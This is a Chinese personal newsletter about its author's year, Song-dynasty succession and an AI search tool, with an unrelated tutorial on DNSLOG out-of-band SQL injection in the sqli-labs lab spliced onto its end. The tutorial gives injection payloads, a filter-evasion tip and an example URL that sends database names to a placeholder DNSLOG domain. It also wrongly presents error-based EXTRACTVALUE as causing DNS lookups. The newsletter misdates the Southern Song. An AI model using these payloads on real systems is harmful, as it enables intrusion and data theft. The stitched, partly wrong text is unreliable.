为什么大宋不能是五代之后的第六代 - 酒馆来信 008

本文回顾了作者过去一年的生活变化和个人成长,结合历史事件如北宋初期的皇位继承问题,以及现代科技如AI搜索在提供高效信息检索中的作用,探讨了权力交接与团队协作的重要性。

Hello~

好久不见, 朋友们! 欢迎收看酒馆来信第 八 期.

自从 2022 年 8 月 6 日第七期的酒馆来信之后, 断更已有 1 年 07 个月 4 天.

在酒馆来信 002期中, 有一小节叫⚙️效率与🐕单身齐飞, 断更证明是真的: 那段时间, 我开始恋爱了 🫣.

过去的一年半时间, 我度过了 30 虚岁, 成家了, 换了工作, 目前努力立业中~ Fighting 🆙


有启发

公元1000年:宋代如何走出五代阴影?

8d7364d5758a4cbe7c98248906de842a.png

图片加载中

这是罗老师<文明之旅>的第一期. 从宰相吕端之死说起, 讲到"宋太宗驾崩, 吕端如何阻止太后另立新君", 讲到五代宋初的皇帝继承问题.

视频中提到: 五代历53年,有过14位皇帝. 政权和皇位更替太频繁了!

至于大宋, 太宗赵匡义是太祖赵匡胤的弟弟, 皇位是兄终弟及的. 太宗在位时, 后来的真宗已经被立为太子了. 然而, 当太宗驾崩 (公元 997 年), 在有储君的情况下, 太后欲废幼立长, 另立新君. 这, 就是五代的阴影.

从后世看, 宋是五代之后的统一王朝, 北宋历 167 年 (公元 960-1127年), 南宋历 152 年 (公元1127-1129 年), 两宋共 319 年. 但是, 从当世的视角看, 997 年, 赵宋才历两任皇帝, 承平才 38 年, 之前是近百年的唐末乱世. 凭什么他赵家不会重蹈五代的覆辙, 成为"梁唐晋汉周宋"中的第六代呢?

所以太宗太后要立更年长的皇子为皇帝, 为了皇权与国家的稳定. 这符合乱世的皇权交接逻辑, 不无道理. 吕端保太子登基, 则是因为太子地位的合法性: 要保证国家的长期稳定, 太子地位不可动摇.

以上, 比起吕端的"大事不糊涂", 带给我更多启发的, 反而是太宗太后为什么糊涂了. 从后世的命名看, 五代十国与大宋有着明显的分别; 但是作为当世人, 尤其是亲历者, 情况是完全不一样的, 大宋会是梁唐晋汉周之后的第六代吗?

读书摘记

  1. Small, aligned teams can build great things fast. 小而团结的团队可以快速构建伟大的东西。(Leandro von Werra 从事 BigCodeProject 的经验之谈)

  2. 康总说,名堂不少。梅瑞说,也许,这朋友,全部是乱讲。康总不响。梅瑞说,人讲的故事,往往是表面文章,懂了吧。(<繁花>)

  3. 有一次我去重庆见一个客户,客户问了我一个问题:“为什么重庆的火锅这么好吃,却没有特别火的全国性品牌?”我说,其实只是重庆人觉得重庆火锅好吃,作为一个山东人,我觉得重庆火锅又油又腻、又麻又辣,我真的没办法接受这种重口味。(<营销笔记>)

好物推荐

  1. 秘塔AI搜索: AI 新时代的搜索引擎, 能够根据用户输入的问题, 检索相关网页, 自动组织内容, 并由 AI 生成答案.

  • 比起谷歌百度类搜索引擎, 可直达答案, 省去了人工再通过浏览网页寻找答案的过程; 因为是 AI 自动生成的答案, 需要辨别.

  • 秘塔AI搜索- 为什么说吕端大事不糊涂

  • 秘塔AI搜索- 鸟山明的生平

2d77fdb82bb7040e450f77d9c2962ccb.png

图片加载中

7941fdffb217dfdd31667967a2163076.png

图片加载中


如果你喜欢酒馆来信,欢迎转发给更多的朋友(竹白订阅链接:iamkissg.zhubai.love),也欢迎回信交流:kissgletter@outlook.com。

祝各位阅读愉快

赵喧典 于 🏮 观照酒馆(notes.lifelonglove.cn)

Mar 10, 2024 at 20:54

### sqli-labs DNSLOG数据外带教程 在学习 `sqli-labs` 的过程中,可以通过实验掌握 DNSLOG 数据外带技术。以下是关于如何利用此技术完成 SQL 注入的具体说明。 #### 使用场景分析 DNSLOG 外带注入是一种高级的 SQL 注入方式,在某些情况下可以绕过传统的报错注入或布尔/时间盲注限制。当目标环境不允许返回错误信息或者延迟响应时,这种技术尤为有效[^2]。 #### 构造查询语句 为了实现数据外带,通常会借助 MySQL 函数如 `CONCAT()` 或者 `EXTRACTVALUE()` 来构建恶意输入并触发外部请求。例如: ```sql SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT DATABASE()), 0x7e)); ``` 上述代码片段展示了如何提取当前数据库名称并通过特殊字符分隔符 (`~`) 将其嵌套到 XML 解析器中引发异常行为[^4]。 如果服务器配置允许网络访问,则该操作可能会尝试解析类似于下面这样的 URL 地址: ``` http://<database_name>.your-dnslog-domain.com/ ``` 其中 `<database_name>` 是实际存在的库名;而 `your-dnslog-domain.com` 则需替换为你控制下的合法域名服务提供商地址(比如 ceye.io)。 #### 完整攻击流程实例 假设我们正在测试 Less-9 题目,并希望获取所有可用表的信息列表。此时可按照如下步骤执行: 1. **准备工具** - 设置好自己的 DNSLog 平台账户。 2. **编写payload** 下面是一个可能用于泄露 schema 名称的例子: ```sql id=-1' AND ExtractValue(1, CONCAT('!', (SELECT SUBSTRING(GROUP_CONCAT(table_name), 1, LENGTH(GROUP_CONCAT(table_name))) FROM information_schema.tables WHERE table_schema=database())))! --+ ``` 3. **发送请求** 当这条命令被执行之后,应该能看到类似以下格式的日志条目出现在您的 DNS 记录里头: ``` http://tables_names.your-dnslog-domain.com/ ``` 注意这里同样需要考虑关键字过滤问题,必要时采用变形写法规避检测机制[^3]。 --- ### 注意事项 尽管这种方法非常强,但在真实环境中实施前务必获得授权许可以免触犯法律条款! ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值